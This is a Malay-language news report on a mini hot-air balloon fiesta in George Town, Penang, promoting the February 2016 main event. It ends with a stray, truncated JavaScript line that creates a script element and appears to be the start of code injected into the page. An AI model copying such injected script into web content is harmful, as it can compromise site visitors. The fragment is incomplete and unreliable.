Fiesta Belon Udara Panas P. Pinang 2016, 9 – 10 Februari

Oleh : NORSHAHIDA YUSOFF

Gambar : ALISSALA THIAN

GEORGE TOWN – Penganjuran Fiesta Belon Udara Panas Mini Pulau Pinang yang julung kali diadakan di Occupy Beach Street di sini berjaya menarik lebih daripada 800 pengunjung baru-baru ini.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng berkata, penganjuran berkaitan adalah sebagai sebahagian daripada acara yang diadakan bagi mempromosikan program utama, Fiesta Belon Udara Panas Pulau Pinang 2016 yang bakal berlangsung pada 9 dan 10 Februari 2016 iaitu sempena Tahun Baru Cina.

“Buat pertama kalinya, belon udara panas dipamerkan di sini (Occupy Beach Street) bagi memberi gambaran berhubung acara utama yang bakal berlangsung nanti.

“Acara kemuncak akan menampilkan 15 belon udara panas bermula pada jam 7 pagi hingga 9.30 malam di Padang Polo di sini dan masuk adalah percuma,’’ katanya pada Majlis Perasmian Fiesta Belon Udara Panas Mini Pulau Pinang di sini baru-baru ini.

Hadir sama, Pengarah Khidmat Pengurusan Majlis Bandaraya Pulau Pinang (MBPP), Mohamed Akbar M u s t a p h a , wakil Penang Global Tourism (PGT) dan wakil penganjur dari AKA Balloons Sdn. Bhd..

Turut diadakan adalah bengkel mini mewarna kraf kertas belon udara panas untuk kanakkanak berusia 12 tahun dan ke bawah.

var d=document;var s=d.createElement(‘script’);